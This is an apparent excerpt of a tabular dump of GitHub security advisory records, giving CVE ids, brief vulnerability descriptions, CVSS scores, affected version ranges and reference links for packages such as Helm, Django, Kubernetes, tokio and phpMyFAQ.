'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/notaryproject/notation-go'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.0-rc.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/notaryproject/notation-go/security/advisories/GHSA-87x9-7grx-m28v'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-25656'}, {'type': 'WEB', 'url': 'https://github.com/notaryproject/notation-go/pull/275'}, {'type': 'PACKAGE', 'url': 'https://github.com/notaryproject/notation-go'}, {'type': 'WEB', 'url': 'https://github.com/notaryproject/notation-go/releases/tag/v1.0.0-rc.3'}]","{'cwe_ids': ['CWE-770'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-22T00:03:49Z', 'nvd_published_at': '2023-02-20T16:15:00Z'}" 1.4.0,GHSA-pwcw-6f5g-gxf8,2023-02-08T22:36:51Z,2023-02-08T22:36:51Z,,['CVE-2023-25165'],Helm vulnerable to information disclosure via getHostByName Function ,"A Helm contributor discovered an information disclosure vulnerability using the `getHostByName` template function. ### Impact `getHostByName` is a Helm template function introduced in Helm v3. The function is able to accept a hostname and return an IP address for that hostname. To get the IP address the function performs a DNS lookup. The DNS lookup happens when used with `helm install|upgrade|template` or when the Helm SDK is used to render a chart. Information passed into the chart can be disclosed to the DNS servers used to lookup the IP address. For example, a malicious chart could inject `getHostByName` into a chart in order to disclose values to a malicious DNS server. ### Patches The issue has been fixed in Helm 3.11.1. ### Workarounds Prior to using a chart with Helm verify the `getHostByName` function is not being used in a template to disclose any information you do not want passed to DNS servers. ### For more information Helm's security policy is spelled out in detail in our [SECURITY](https://github.com/helm/community/blob/master/SECURITY.md) document. ### Credits Disclosed by Philipp Stehle at SAP.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'helm.sh/helm/v3'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '3.11.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/helm/helm/security/advisories/GHSA-pwcw-6f5g-gxf8'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-25165'}, {'type': 'WEB', 'url': 'https://github.com/helm/helm/commit/293b50c65d4d56187cd4e2f390f0ada46b4c4737'}, {'type': 'WEB', 'url': 'https://github.com/helm/helm/commit/5abcf74227bfe8e5a3dbf105fe62e7b12deb58d2'}, {'type': 'PACKAGE', 'url': 'https://github.com/helm/helm'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2023-1547'}]","{'cwe_ids': ['CWE-200'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-08T22:36:51Z', 'nvd_published_at': '2023-02-08T20:15:00Z'}" 1.4.0,GHSA-f8hv-rx9p-f9r4,2023-03-02T19:55:14Z,2023-02-20T12:30:18Z,,['CVE-2016-15025'],generator-hottowel Cross-site Scripting vulnerability,"A vulnerability, which was classified as problematic, was found in generator-hottowel 0.0.11. Affected is an unknown function of the file app/templates/src/server/_app.js of the component 404 Error Handler. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. The name of the patch is c17092fd4103143a9ddab93c8983ace8bf174396. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-221484.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'generator-hottowel'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.5.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2016-15025'}, {'type': 'WEB', 'url': 'https://github.com/johnpapa/generator-hottowel/pull/174'}, {'type': 'WEB', 'url': 'https://github.com/johnpapa/generator-hottowel/commit/c17092fd4103143a9ddab93c8983ace8bf174396'}, {'type': 'PACKAGE', 'url': 'https://github.com/johnpapa/generator-hottowel'}, {'type': 'WEB', 'url': 'https://vuldb.com/?ctiid.221484'}, {'type': 'WEB', 'url': 'https://vuldb.com/?id.221484'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-22T00:08:15Z', 'nvd_published_at': '2023-02-20T10:15:00Z'}" 1.4.0,GHSA-h97r-fchm-m23x,2023-02-23T21:31:31Z,2023-02-15T15:30:41Z,,['CVE-2023-25763'],Cross-site Scripting in Jenkins Email Extension Plugin,"Jenkins Email Extension Plugin 2.93 and earlier does not escape various fields included in bundled email templates, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to control affected fields.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:email-ext'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.93'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-25763'}, {'type': 'PACKAGE', 'url': 'https://github.com/jenkinsci/email-ext-plugin'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-02-15/#SECURITY-2931'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/02/15/4'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-15T18:29:54Z', 'nvd_published_at': '2023-02-15T14:15:00Z'}" 1.4.0,GHSA-84mm-prjg-49xm,2023-02-14T16:47:31Z,2023-02-06T21:30:30Z,,['CVE-2015-10073'],tinymighty WikiSEO is vulnerable to cross-site scripting via modifyHTML function,A vulnerability was found in tinymighty WikiSEO 1.2.1. This affects the function modifyHTML of the file WikiSEO.body.php of the component Meta Property Tag Handler. The manipulation of the argument content leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 1.2.2 is able to address this issue. The name of the patch is 089a5797be612b18a820f9f1e6593ad9a91b1dba. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-220215.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'tinymighty/wiki-seo'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.2.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2015-10073'}, {'type': 'WEB', 'url': 'https://github.com/tinymighty/wiki-seo/pull/21'}, {'type': 'WEB', 'url': 'https://github.com/tinymighty/wiki-seo/commit/089a5797be612b18a820f9f1e6593ad9a91b1dba'}, {'type': 'PACKAGE', 'url': 'https://github.com/tinymighty/wiki-seo'}, {'type': 'WEB', 'url': 'https://github.com/tinymighty/wiki-seo/releases/tag/1.2.2'}, {'type': 'WEB', 'url': 'https://vuldb.com/?ctiid.220215'}, {'type': 'WEB', 'url': 'https://vuldb.com/?id.220215'}]","{'cwe_ids': ['CWE-79'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-02-07T20:11:12Z', 'nvd_published_at': '2023-02-06T20:15:00Z'}" 1.4.0,GHSA-hf4x-6h87-hm79,2023-02-23T19:39:54Z,2023-02-23T19:39:54Z,,['CVE-2023-22476'],MantisBT may expose private issues' summaries to unauthorized users,"### Impact Due to insufficient access-level checks, any logged-in user allowed to perform Group Actions can get access to the _Summary_ field of private Issues (i.e. having Private view status, or belonging to a private Project) via a crafted `bug_arr[]` parameter in *bug_actiongroup_ext.php*. ### Patches Patch is under development. The vulnerability will be fixed in MantisBT version 2.25.6. ### Workarounds None ### Credits Thanks to [d3vpoo1](https://github.com/jrckmcsb) for reporting the issue. ### References - https://mantisbt.org/bugs/view.php?id=31086 ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'mantisbt/mantisbt'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.25.6'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.25.5'}}]","[{'type': 'WEB', 'url': 'https://github.com/mantisbt/mantisbt/security/advisories/GHSA-hf4x-6h87-hm79'}, {'type': 'PACKAGE', 'url': 'https://github.com/mantisbt/mantisbt'}, {'type': 'WEB', 'url': 'https://mantisbt.org/bugs/view.php?id=31086'}]","{'cwe_ids': ['CWE-200'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-23T19:39:54Z', 'nvd_published_at': None}" 1.4.0,GHSA-368x-wmmg-hq5c,2023-02-22T21:58:33Z,2023-02-22T21:58:33Z,,['CVE-2023-25570'],Apollo has potential access control security issue in eureka,"### Impact If users expose the apollo-configservice to the internet (which is not recommended), there are potential security issues since there is no authentication feature enabled for the built-in eureka service. Malicious hackers may access eureka directly to mock apollo-configservice and apollo-adminservice . ### Patches Login authentication for eureka was added in https://github.com/apolloconfig/apollo/pull/4663 and was released in [v2.1.0](https://github.com/apolloconfig/apollo/releases/tag/v2.1.0). ### Workarounds To fix the potential issue without upgrading, simply follow the advice that does not expose apollo-configservice to the internet. ### References [Apollo Security Guidence](https://www.apolloconfig.com/#/en/usage/apollo-user-guide?id=_71-security-related) ### For more information If you have any questions or comments about this advisory: * Open an issue in [issue](https://github.com/apolloconfig/apollo/issues) * Email us at [apollo-config@googlegroups.com](mailto:apollo-config@googlegroups.com) ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.ctrip.framework.apollo:apollo'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/apolloconfig/apollo/security/advisories/GHSA-368x-wmmg-hq5c'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-25570'}, {'type': 'WEB', 'url': 'https://github.com/apolloconfig/apollo/pull/4663'}, {'type': 'WEB', 'url': 'https://github.com/apolloconfig/apollo/commit/7df79bf8df6960433ed4ff782a54e3dfc74632bd'}, {'type': 'PACKAGE', 'url': 'https://github.com/apolloconfig/apollo'}, {'type': 'WEB', 'url': 'https://github.com/apolloconfig/apollo/releases/tag/v2.1.0'}]","{'cwe_ids': ['CWE-306'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-22T21:58:33Z', 'nvd_published_at': '2023-02-20T16:15:00Z'}" 1.4.0,GHSA-q2jf-h9jm-m7p4,2023-02-08T22:40:58Z,2023-02-01T21:30:23Z,,['CVE-2023-23969'],Django contains Uncontrolled Resource Consumption via cached header,"In Django 3.2 before 3.2.17, 4.0 before 4.0.9, and 4.1 before 4.1.6, the parsed values of Accept-Language headers are cached in order to avoid repetitive parsing. This leads to a potential denial-of-service vector via excessive memory usage if the raw value of Accept-Language headers is very large.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'django'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.2a1'}, {'fixed': '3.2.17'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'django'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0a1'}, {'fixed': '4.0.9'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'django'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.1a1'}, {'fixed': '4.1.6'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-23969'}, {'type': 'WEB', 'url': 'https://docs.djangoproject.com/en/4.1/releases/security/'}, {'type': 'WEB', 'url': 'https://groups.google.com/forum/#!forum/django-announce'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2023/02/msg00000.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HWY6DQWRVBALV73BPUVBXC3QIYUM24IK/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/LTZVAKU5ALQWOKFTPISE257VCVIYGFQI/'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20230302-0007/'}, {'type': 'WEB', 'url': 'https://www.djangoproject.com/weblog/2023/feb/01/security-releases/'}]","{'cwe_ids': ['CWE-400', 'CWE-770'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-03T21:07:17Z', 'nvd_published_at': '2023-02-01T19:15:00Z'}" 1.4.0,GHSA-f9c6-4j9h-6c5r,2023-02-28T14:36:54Z,2023-02-17T03:30:25Z,,['CVE-2023-0880'],Misinterpretation of Input in thorsten/phpmyfaq,Misinterpretation of Input in GitHub repository thorsten/phpmyfaq prior to 3.1.11.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'thorsten/phpmyfaq'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.1.11'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0880'}, {'type': 'WEB', 'url': 'https://github.com/thorsten/phpmyfaq/commit/a67dca41576834a1ddfee61b9e799b686b75d4fa'}, {'type': 'PACKAGE', 'url': 'https://github.com/thorsten/phpMyFAQ'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/14fc4841-0f5d-4e12-bf9e-1b60d2ac6a6c'}]","{'cwe_ids': ['CWE-115'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-17T20:55:07Z', 'nvd_published_at': '2023-02-17T03:15:00Z'}" 1.4.0,GHSA-8237-3q5g-99fv,2023-02-27T14:56:32Z,2023-02-25T06:30:21Z,,['CVE-2023-26104'],Denial of Service vulnerability in lite-web-server,All versions of the package lite-web-server are vulnerable to Denial of Service (DoS) when an attacker sends an HTTP request and includes control characters that the decodeURI() function is unable to parse.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'lite-web-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.2.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-26104'}, {'type': 'WEB', 'url': 'https://gist.github.com/lirantal/637520812da06fffb91dd86d02ff6bde'}, {'type': 'PACKAGE', 'url': 'https://github.com/chasyumen/lite-web-server'}, {'type': 'WEB', 'url': 'https://github.com/chasyumen/lite-web-server/blob/main/src/WebServer.js#23L274'}, {'type': 'WEB', 'url': 'https://security.snyk.io/vuln/SNYK-JS-LITEWEBSERVER-3153703'}]","{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-27T14:56:32Z', 'nvd_published_at': '2023-02-25T05:15:00Z'}" 1.4.0,GHSA-w67w-mw4j-8qrv,2023-03-06T21:59:59Z,2023-02-08T22:27:42Z,,['CVE-2022-4203'],openssl-src contains Read Buffer Overflow in X.509 Name Constraint,"A read buffer overrun can be triggered in X.509 certificate verification, specifically in name constraint checking. Note that this occurs after certificate chain signature verification and requires either a CA to have signed the malicious certificate or for the application to continue certificate verification despite failure to construct a path to a trusted issuer. The read buffer overrun might result in a crash which could lead to a denial of service attack. In theory it could also result in the disclosure of private memory contents (such as private keys, or sensitive plaintext) although we are not aware of any working exploit leading to memory contents disclosure as of the time of release of this advisory. In a TLS client, this can be triggered by connecting to a malicious server. In a TLS server, this can be triggered if the server requests client authentication and a malicious client connects. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'openssl-src'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '300.0.0'}, {'fixed': '300.0.12'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-4203'}, {'type': 'WEB', 'url': 'https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=c927a3492698c254637da836762f9b1f86cffabc'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2023-0008.html'}, {'type': 'WEB', 'url': 'https://www.openssl.org/news/secadv/20230207.txt'}]","{'cwe_ids': ['CWE-125'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-02-08T22:27:42Z', 'nvd_published_at': '2023-02-24T15:15:00Z'}" 1.4.0,GHSA-4q83-7cq4-p6wg,2023-02-04T00:30:37Z,2023-02-04T00:30:37Z,,[],`tokio::io::ReadHalf::unsplit` is Unsound,"`tokio::io::ReadHalf::unsplit` can violate the `Pin` contract The soundness issue is described in the [tokio/issues#5372](https://github.com/tokio-rs/tokio/issues/5372) Specific set of conditions needed to trigger an issue (a !Unpin type in ReadHalf) is unusual, combined with the difficulty of making any arbitrary use-after-free exploitable in Rust without doing a lot of careful alignment of data types in the surrounding code. The `tokio` feature `io-util` is also required to be enabled to trigger this soundness issue. Thanks to zachs18 reporting the issue to Tokio team responsibly and taiki-e and carllerche appropriately responding and fixing the soundness bug. Tokio before 0.2.0 used `futures` 0.1 that did not have `Pin`, so it is not affected by this issue. ",[],"[{'package': {'ecosystem': 'crates.io', 'name': 'tokio'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.21.0'}, {'fixed': '1.24.2'}]}]}, {'package': {'ecosystem': 'crates.io', 'name': 'tokio'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.19.0'}, {'fixed': '1.20.4'}]}]}, {'package': {'ecosystem': 'crates.io', 'name': 'tokio'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.2.0'}, {'fixed': '1.18.5'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tokio-rs/tokio/issues/5372'}, {'type': 'PACKAGE', 'url': 'https://github.com/tokio-rs/tokio'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2023-0005.html'}]","{'cwe_ids': [], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2023-02-04T00:30:37Z', 'nvd_published_at': None}" 1.4.0,GHSA-3hjh-5hgx-f5wh,2023-02-24T16:02:45Z,2023-02-13T06:30:59Z,,['CVE-2022-25937'],Path traversal vulnerability in glance,Versions of the package glance before 3.0.9 are vulnerable to Directory Traversal that allows users to read files outside the public root directory. This is related to but distinct from the vulnerability reported in [CVE-2018-3715](https://security.snyk.io/vuln/npm:glance:20180129).,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'glance'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.0.9'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-25937'}, {'type': 'WEB', 'url': 'https://github.com/jarofghosts/glance/commit/8cecfe90286e0c45a5494067f1b592d0ccfeabac'}, {'type': 'WEB', 'url': 'https://gist.github.com/lirantal/c8cfb0398c78e558b7d4ac02aae67809'}, {'type': 'PACKAGE', 'url': 'https://github.com/jarofghosts/glance'}, {'type': 'WEB', 'url': 'https://security.snyk.io/vuln/SNYK-JS-GLANCE-3318395'}]","{'cwe_ids': ['CWE-22'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-14T16:52:35Z', 'nvd_published_at': '2023-02-13T05:15:00Z'}" 1.4.0,GHSA-8mjg-8c8g-6h85,2023-08-30T10:44:16Z,2023-02-06T23:27:00Z,,['CVE-2020-8564'],Kubernetes Sensitive Information leak via Log File,"In Kubernetes clusters using a logging level of at least 4, processing a malformed docker config file will result in the contents of the docker config file being leaked, which can include pull secrets or other registry credentials. This affects < v1.19.3, < v1.18.10, < v1.17.13.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/kubernetes/kubernetes'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.19.0'}, {'fixed': '1.19.3'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/kubernetes/kubernetes'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.18.0'}, {'fixed': '1.18.10'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/kubernetes/kubernetes'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.17.13'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'k8s.io/kubernetes'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.20.0-alpha.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-8564'}, {'type': 'WEB', 'url': 'https://github.com/kubernetes/kubernetes/issues/95622'}, {'type': 'WEB', 'url': 'https://github.com/kubernetes/kubernetes/pull/94712'}, {'type': 'WEB', 'url': 'https://github.com/kubernetes/kubernetes/commit/11793434dac97a49bfed0150b56ac63e5dc34634'}, {'type': 'PACKAGE', 'url': 'https://github.com/kubernetes/kubernetes'}, {'type': 'WEB', 'url': 'https://groups.google.com/g/kubernetes-security-discuss/c/vm-HcrFUOCs/m/36utxAM5CwAJ'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2021-0066'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210122-0006/'}]","{'cwe_ids': ['CWE-532'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-06T23:27:00Z', 'nvd_published_at': None}" 1.4.0,GHSA-gxxj-x426-xj2w,2023-02-23T22:08:38Z,2023-02-12T15:30:25Z,,['CVE-2023-0787'],Cross-site Scripting in thorsten/phpmyfaq,Cross-site Scripting (XSS) - Generic in GitHub repository thorsten/phpmyfaq prior to 3.1.11.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'thorsten/phpmyfaq'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.1.11'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0787'}, {'type': 'WEB', 'url': 'https://github.com/thorsten/phpmyfaq/commit/b76d58321a7a595eeaf4f7a30403ca6cd8506612'}, {'type': 'PACKAGE', 'url': 'https://github.com/thorsten/phpMyFAQ'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/87397c71-7b84-4617-a66e-fa6c73be9024'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-14T01:05:26Z', 'nvd_published_at': '2023-02-12T14:15:00Z'}" 1.4.0,GHSA-hpp2-2cr5-pf6g,2023-02-14T21:49:55Z,2023-02-14T21:49:55Z,,['CVE-2023-25576'],Denial of service due to unlimited number of parts,"### Impact * The multipart body parser accepts an unlimited number of file parts. * The multipart body parser accepts an unlimited number of field parts. * The multipart body parser accepts an unlimited number of empty parts as field parts. ### Patches This is fixed in v7.4.1 (for Fastify v4.x) and v6.0.1 (for Fastify v3.x). ### Workarounds There are no known workaround. ### References Reported at https://hackerone.com/reports/1816195.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': '@fastify/multipart'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.0.1'}]}]}, {'package': {'ecosystem': 'npm', 'name': '@fastify/multipart'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.4.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/fastify/fastify-multipart/security/advisories/GHSA-hpp2-2cr5-pf6g'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-25576'}, {'type': 'WEB', 'url': 'https://github.com/fastify/fastify-multipart/commit/85be81bedf5b29cfd9fe3efc30fb5a17173c1297'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/1816195'}, {'type': 'PACKAGE', 'url': 'https://github.com/fastify/fastify-multipart'}, {'type': 'WEB', 'url': 'https://github.com/fastify/fastify-multipart/releases/tag/v6.0.1'}, {'type': 'WEB', 'url': 'https://github.com/fastify/fastify-multipart/releases/tag/v7.4.1'}]","{'cwe_ids': ['CWE-400', 'CWE-770'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-14T21:49:55Z', 'nvd_published_at': '2023-02-14T16:15:00Z'}" 1.4.0,GHSA-r887-gfxh-m9rr,2023-03-06T19:44:37Z,2023-02-08T18:07:16Z,,['CVE-2023-25307'],mrpack-install vulnerable to path traversal with dependency,"### Impact Importing a malicious `.mrpack` file can cause path traversal while downloading files. This can lead to scripts or config files being placed or replaced at arbitrary locations, without the user noticing. ### Patches No patches yet. ### Workarounds Avoid importing `.mrpack` files from untrusted sources. ### References https://docs.modrinth.com/docs/modpacks/format_definition/#files ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/nothub/mrpack-install'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.16.3'}]}], 'database_specific': {'last_known_affected_version_range': '<= 0.16.2'}}]","[{'type': 'WEB', 'url': 'https://github.com/nothub/mrpack-install/security/advisories/GHSA-r887-gfxh-m9rr'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-25307'}, {'type': 'WEB', 'url': 'https://github.com/nothub/mrpack-install/commit/a1f424b6a616d2de95228781eef3b92b9769f23c'}, {'type': 'PACKAGE', 'url': 'https://github.com/nothub/mrpack-install'}, {'type': 'WEB', 'url': 'https://github.com/nothub/mrpack-install/releases/tag/v0.16.3'}, {'type': 'WEB', 'url': 'https://quiltmc.org/en/blog/2023-02-04-five-installer-vulnerabilities/'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-08T18:07:16Z', 'nvd_published_at': None}" 1.4.0,GHSA-xrw3-wqph-3fxg,2023-02-08T16:14:16Z,2023-02-01T12:32:41Z,2023-02-02T19:26:27Z,[],Withdrawn: wallabag subject to Improper Authorization via annotations,"## Duplicate advisory This advisory has been withdrawn because it is a duplicate of [GHSA-mrqx-mjc4-vfh3](https://github.com/advisories/GHSA-mrqx-mjc4-vfh3). This link is maintained to preserve external references. ## Original Description Improper Authorization in GitHub repository wallabag/wallabag prior to 2.5.3.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'wallabag/wallabag'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0-beta.1'}, {'fixed': '2.5.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0610'}, {'type': 'WEB', 'url': 'https://github.com/wallabag/wallabag/commit/5ac6b6bff9e2e3a87fd88c2904ff3c6aac40722e'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/8fdd9b31-d89b-4bbe-9557-20b960faf926'}]","{'cwe_ids': ['CWE-285'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-02T19:26:27Z', 'nvd_published_at': '2023-02-01T12:15:00Z'}" 1.4.0,GHSA-vvpx-j8f3-3w6h,2023-03-09T21:20:44Z,2023-02-17T14:00:02Z,,['CVE-2022-41723'],Uncontrolled Resource Consumption,"A maliciously crafted HTTP/2 stream could cause excessive CPU consumption in the HPACK decoder, sufficient to cause a denial of service from a small number of small requests.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'golang.org/x/net'}, 'ranges': 